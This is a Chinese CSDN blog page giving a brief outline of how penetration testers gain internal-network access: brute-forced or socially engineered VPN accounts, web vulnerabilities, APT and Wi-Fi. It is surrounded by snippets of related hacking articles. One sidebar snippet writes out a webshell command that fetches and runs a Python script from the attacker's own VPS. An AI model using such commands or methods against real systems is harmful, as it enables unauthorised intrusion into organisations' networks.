【基础篇】————3、进入内网

最新推荐文章于 2023-03-27 09:34:30 发布
最新推荐文章于 2023-03-27 09:34:30 发布
阅读量863 收藏 10
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Fly_hps/article/details/89789747
版权

要想进行内网渗透,我们的前提是要获取内网的访问权限,那么如何获取内网的访问权限呢?

基于企业弱账号漏洞

  • VPN(通过邮箱,密码爆破,社工等途径获取VPN)
  • 企业相关运维系统(zabbix等)

基于系统漏洞进入

网站应用程序渗透

  • SQL注入
  • 跨站脚本(XSS)
  • 跨站请求伪造(CSRF)
  • SSRF
  • 功能/业务逻辑漏洞
  • 其他漏洞等
  • CMS-内容管理系统漏洞
  • 企业自建代理

APT攻击

无线Wifi接入

通过接入无线wifi进入内网,获得内网的访问权限。

FLy_鹏程万里
关注
专栏目录
谷粒商城——基础
qq_37875826的博客
06-11 1193
一、项目介绍 商城微服务架构图如上图所示,其中涉及到以下微服务组件: 服务注册/发现&注册中心: A服务调用B服务,A服务并不知道B服务当前在哪几台服务器有,哪些是正常的,哪些服务已经下线。解决这个问题可以引入注册中心。配置中心用来几种管理微服务的配置信息。 服务熔断&服务降级: 在微服务架构中,微服务之间通过网络行通信,存在相互依赖,当其中一个服务不可用时,会造成雪崩效应。要防止这样的情况,必须要有容错机制来保护服务。 例如:订单服务–>商品服务–>库存服务; 库存服务出现
提权学习之旅——基础
Lemon's blog
07-30 891
前言: 无论是CTF赛题还是渗透测试,有很多时候拿到WebShell的权限并不高,没有办法继续深入,所以需要行提权操作,方便下一步的行!看了很多师傅们的博客,大多都是总结下常用思路,对于我这种菜鸡来说还是有点难懂,所以就通过这次总结将理论和实践联系到一起! 基础知识 0x00:什么是提权 提高自己在服务器中的权限,主要针对网站入侵过程中,当入侵某一网站时,通过各种漏洞提升WEBSHELL权限以夺得该服务器权限。 简单的一句话就是权限提升。例如: Windows:User >> Syste
Fpipe的用法
FreeXploiT
10-28 4263
Fpipe的用法经常有人问我这个问题“怎样进入内网”,怎么回答呢,归纳起来就是一句话“突破网关,利用端口重定向进入内网”。首选要突破网关(GetWay),这很容易理解.因为一个内网要访问internet总是必然通过网关接入的,至于怎样突破网关,这和进入不是网关的服务器没有什么两样,就不说了。 突破网关以后,我们的目标就是通过网关上网的192.168.21.75。以后的方法就是在网关力端口重定向
【学习笔记】进入内网的几种方法
chualam的博客
10-29 3369
当可以通过ssh连接A 目标访问B ssh ip -lrr //空密码连接 ssh ip -D端口 -CNfg(流量压缩) //端口转发 >>export all_proxy=http://127.0.0.1:端口 当不可以通过ssh 下载反弹shell 的py脚本 通过py启动http (python -m SimpleHTTPServer) curl A的ip/shell.php --data "c=system("curl 我的vps的ip/xx.py|python");" nc -l.
【SDL实践指南】安全培训介绍
最新发布
Fly_鹏程万里
03-27 263
安全并不仅仅是安全团队的本职工作,也是企业的每个研发人员、产品经理、项目经理、企业高管额外的工作,每个企业员工都应该要了解安全基础知识并知道如何在软件和服务中构建安全以使产品更加安全,并在满足业务需求的同时并提供安全价值。 在企业SDL安全建设的第一步就是安全培训,这为企业构建安全体系制定了一个很好的基调,企业可以结合自身特点来制定安全培训计划和安全培训方式,就目前而言很多大公司的安全培训内容都要求必须要贯穿整个SDL流程,但安全培训的目的并非是要确保每个人都成为安全专家,也不是力求要成为熟练的渗透测试人员
黑客||教你如何进入内网
热门推荐
weixin_40895548的博客
03-04 4万+
经常有人问我这个问题“怎样进入内网”,怎么回答呢,归纳起来就是一句话“突破网关,利用端口重定向进入内网”。首选要突破网关(GetWay),这很容易理解.因为一个内网要访问internet总是必然通过网关接入的,至于怎样突破网关,这和进入不是网关的服务器没有什么两样,就不说了。 突破网关以后,我们的目标就是通过网关上网的192.168.21.75。以后的方法就是在网关力端口重定向,建立包转发。端口重...
【文件包含技巧拓展】————3、文件包含漏洞(上)
Fly_鹏程万里
01-30 622
导语: 当程序员在编写代码的过程中,由于使用PHP文件包含函数过滤不严,从而导致了文件包含漏洞。在PHP中用于文件包含的函数有四个: require require_once include include_once include和require区别主要是include在包含的过程中如果出现错误,会抛出一个警告,程序继续正常运行;而require函数出现错误的时候,会直接报错并退出程序...
jmeter性能测试实战——基础
Sunshine的博客
02-21 1万+
一、下载jmeter安装包 官网下载:https://jmeter.apache.org/download_jmeter.cgi 配置插件:plugins manager 【参考网站:https://jmeter-plugins.org/install/Install/】 把jar包放入你的JMeter根目录下的 lib/ext 目录 运行jmeter,在选项中即可看到插件管理工具 二、分布式...
内网渗透——WINDOWS认证机制之KERBEROS
我们为什么能在这里遇到?
11-12 1325
参考:ares-x 域渗透学习(二) KERBEROS协议
又双叒叕来更新啦!!Hadoop——基础
5akura's Blog
07-09 933
文章目录Hadoop基础大数据概论Hadoop入门Hadoop的组成HDFS架构概述Yarn架构MapReduce架构大数据的技术生态体系开发环境搭建安装jdk安装Hadoop本地模式伪分布式模式启动HDFS并运行MapReduce程序配置集群启动集群启动YARN并运行MapReduce程序配置集群启动集群配置历史服务器日志的聚集配置完全分布式模式(重点!!)准备工作编写集群分发脚本xsync集群配置集群单点启动SSH免密登录免密登录的原理群起集群crond系统定时任务集群时间同步使用chrony搭建nt
kali连接内网设置
qq_43390703的博客
10-09 1671
**kali无法正常桥接的问题** 一般用VM安装完kali镜像以后根据默认选项就能够正常上网了。但是如果需要学习渗透的话一般需要用桥接来加入内网。所以有时候需要修改网络连接设定。 进入虚拟网络编辑器 点击更改设置,行选项设定。 之后再去设置虚拟机的设置即可 现在就可以正常连接上内网了。 ...
Linux本地信息收集
Fly_鹏程万里
10-30 406
在获取到webshell之后,经常会遇到Linux的操作系统,这是我们需要对Linux系统本地的敏感资源行信息收集,为一步测试做准备,下面就是一些有用的信息获取方式。 收集内核,操作系统等信息 命令 作用 uname -a 打印所有可用的系统信息 uname -r 内核版本信息 uname -n 系统主机名字 hostname 主机名 un...
4、DNS隧道
Fly_鹏程万里
06-08 1678
0x00 前言前两天和朋友说到代理,随之讨论了一下关于隧道技术,之前也发过一关于DNS隧道技术的文章,不过感觉没有写好,今天就重写一下关于隧道技术的总结;首先这文章是以前写的,也发在乌云过,最近为博客更新一些隧道技术的东西,所以先把这老文章拿出来,后面会更新一些新的东西,也欢迎大家提出新的思路;0x01 概念隧道技术(Tunneling)是一种通过使用互联网络的基础设施在网络之间传递数据的方...
内网渗透-如何利用msf把流量代理内网-隧道搭建
weixin_42109829的博客
01-10 7065
0x01 前言 在攻防演练时,当我们拿下主机时,我们要开始对内网行渗透,常见的手法有,frp,ew,等代理工具,这里我介绍一个工具 msf 模块中的socket 4a代理工具,这里我使用的是msf 5的版本,好像在使用msf 6的版本一直不成功的样子,所以你们做遇到代理不成功的情况下,可以尝试换个msf 5的版本行尝试。 0x02 生成路由 msf操作 拓扑图如下 首先先生成一个elf 马行上线 linux 生成木马上线文章—>linux主机生成木马攻击 run autoroute -s ip
怎样在外网访问内网
cao849861802的博客
06-21 1605
我这边是用的两种方案,一种是直接采用内网穿透,神卓互联或者其他的软件可以实现内网穿透。 另一种是zerotier,这个软件则是在设备上面创建一个虚拟网卡,然后搭建一个vpn,在需要的设备上 ...
分享进入内网的详细步骤
王浩然的博客
05-25 5046
分享进入内网的详细步骤:   想要进入官网,首选要突破网关(GetWay),这很容易理解,因为一个内网要访问internet总是必然通过网关接入的,至于怎样突破网关,这和进入不是网关的服务器没有什么两样,就不说了。   突破网关以后,我们的目标就是通过网关(IP为202.98.*.*)上网的192.168.21.75。以后的方法就是在网关力端口重定向,建立包转发。端口重定向分两种(lo
DEFCON 26 | 利用传真功能漏洞渗透进入企业内网(Faxploit)
Fly_鹏程万里
09-06 1164
从远古时代的飞鸽传书到后来的邮政快递,写信人与收信人之间的物理消息传递方式逐渐在演变发展,之后,传真技术的出现从某种程度上说,帮助人们走出了信件传递的黑暗时代。 然而,技术发展到今天,就通信手段而言,我们有电子邮件、社交聊天、移动通信渠道、网络服务和高大上的量子卫星通信等等,但在这种喜新厌旧的信息时代中,传真技术仍然没被淘汰,且依旧被广泛使用。根据简单的谷歌搜索可以发现,网上出现了超过3亿个...
【项目】区块链+人工智能 ---PAI白皮书分析(二)
Fly_鹏程万里
07-25 1471
本文为“行动派AlphaBo”的第104号文。 点赞虽怡情,化更重要。每天08:48,让我们一起成长、跃迁,心动不如行动。 昨天,我们从项目简介、解决方案和产品分析三个维度分析了PAI项目,今日我们从另外的几个维度对项目行分析: 团队和投资人(Who)、经济模型分析(How much) 团队和投资人(Who)   PAI的深度战略合作企业OBEN,就是一家技术领先的个人人工智能公司...
3、域渗透详解
Fly_鹏程万里
06-10 3749
在渗透测试过程中,我们经常会遇到以下场景:某处于域中的服务器通过路由做端口映射,对外提供web服务,我们通过web脚本漏洞获得了该主机的system权限,如果甲方有一步的内网渗透测试需求,以证明企业所面临的巨大风险,这个时候就需要做内网的域渗透。通常,我们是以获得域控制器的权限为目标,因为一旦域控制器沦陷,整个内网就尽在掌握中了,在学习域渗透之前,我们需要了解一些基础知识,本期“安仔课堂”,IS...
Spark性能优化基础:开发与资源调优
"Spark性能优化指南——基础"深入探讨了在大数据计算领域广泛应用的Spark平台,其强大的功能使其在离线批处理、SQL查询、实时流处理、机器学习和图计算等方面表现出色。在美团和大众点评等企业,Spark因其快速执行...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值